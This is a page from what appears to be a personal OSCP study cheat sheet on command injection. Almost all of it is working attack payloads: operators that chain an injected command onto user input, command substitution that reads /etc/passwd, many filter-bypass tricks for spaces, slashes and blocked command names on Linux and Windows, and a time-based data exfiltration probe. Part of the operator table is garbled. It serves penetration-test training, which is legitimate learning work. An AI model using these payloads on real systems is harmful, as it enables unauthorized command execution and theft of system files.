☕
My OSCP Journey: Tips, Tricks, and Cheat Sheets
  • Introduction
  • Network Scan
  • Services Exploitation
    • 21 - FTP
    • 25, 465, 587 - SMTP
    • 53 - DNS
    • 88 - Kerberos
    • 80, 443 - HTTP/S
    • 110, 995 - POP
    • 111 - NFS/RPC
    • 135, 593 - MSRPC
    • 139, 445 - SMB
    • 143, 993 - IMAP
    • 161 - SNMP
    • 389, 636, 3268, 3269 - LDAP
    • 3306 - Mysql
    • 5432 - Postgres
    • 27017 - MongoDB
  • Web Application Attacks
    • SQL Injection
    • File Inclusion Vulnerabilty
    • Command Injection
    • Client-Side Attacks
  • Brute Forcing
  • Privilege Escalation
    • Manual Enumeration
      • Windows Enumeration
      • Linux Enumeration
    • Windows Privesc
    • Linux Privesc
  • Active Directory
    • AD Manual Enumeration
    • AD Automatic Enumeration
    • AD Authentication
    • AD Lateral Movement
    • AD Attacking Kerberos
    • Hash Cracking Techniques
  • Transfer Files
    • Windows Downloads
    • Windows Uploads
  • Shells
    • Reverse/Bind Shells
    • Web Shells
Powered by GitBook
On this page
  • Command Chaining
  • I/O Redirection
  • Command Substitution
  • Filter Bypassing
  • Space filtering
  • Slash (/) filtering
  • Command filtering
  • Time Based Data Exfiltration

Was this helpful?

Edit on GitHub
  1. Web Application Attacks

Command Injection

Command Chaining

<input>; ls
<input>& ls
<input>&& ls
<input>| ls
<input>|| ls

Also try:

  • Prepending a flag or parameter.

  • Removing spaces (<input>;ls).

Chaining Operators

Windows and Unix supported.

Syntax
Description

%0A

cmd1 %0A cmd2

Newline. Executes both.

;

cmd1 ; cmd2

Semi-colon operator. Executes both.

&

cmd1 & cmd2

Runs command in the background. Executes both.

`

`

`cmd1

&&

cmd1 && cmd2

AND operator. Executes cmd2 if cmd1 succeds.

`

`

I/O Redirection

> /var/www/html/output.txt
< /etc/passwd

Command Substitution

Replace a command output with the command itself.

<input> `cat /etc/passwd`
<input> $(cat /etc/passwd)

Filter Bypassing

Space filtering

Linux

cat</etc/passwd
# bash
${cat,/etc/passwd}
cat${IFS}/etc/passwd
v=$'cat\x20/etc/passwd'&&$v
IFS=,;`cat<<<cat,/etc/passwd`

Windows

ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

Slash (/) filtering

echo ${HOME:0:1} # /
cat ${HOME:0:1}etc${HOME:0:1}passwd
echo . | tr '!-0' '"-1' # /
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Command filtering

Quotes.

w'h'o'am'i
w"h"o"am"i

Slash.

w\ho\am\i
/\b\i\n/////s\h

At symbol.

who$@ami

Variable expansion.

v=/e00tc/pa00sswd
cat ${v//00/}

Wildcards.

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc

Time Based Data Exfiltration

time if [ $(uname -a | cut -c1) == L ]; then sleep 5; fi
PreviousFile Inclusion VulnerabiltyNextClient-Side Attacks

Last updated 2 years ago

Was this helpful?